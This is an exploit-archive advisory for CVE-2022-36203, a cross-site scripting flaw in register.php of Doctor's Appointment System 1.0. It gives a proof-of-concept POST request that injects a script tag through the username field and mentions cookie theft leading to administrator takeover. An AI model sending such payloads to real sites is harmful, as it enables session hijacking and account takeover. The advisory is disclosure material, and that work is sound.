Headline
Doctor's Appointment System 1.0 Cross Site Scripting
Doctor’s Appointment System version 1.0 suffers from a cross site scripting vulnerability in register.php. Original discovery of cross site scripting in this version is attributed to Soham Bakore in February of 2021.
# Exploit Title: Doctor's Appointment System v1.0 - Cross-Site Scripting (XSS)# Google Dork: N/A# Date: 7/13/2022# Exploit Author: Abdullah Zaid - @_aznull# Vendor Homepage:https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip# Version: 1.0# Tested on: Linux# CVE : CVE-2022-36203POC:POST /register.php HTTP/1.1Host: localhostusername=a"><script>alert(1337)</script>&password=123Related news
CVE-2022-36203: Doctor's Appointment System using PHP Free Source Code
Doctor's Appointment System 1.0 is vulnerable to Cross Site Scripting (XSS) via the admin panel. In addition, it leads to takeover the administrator account by stealing the cookie via XSS.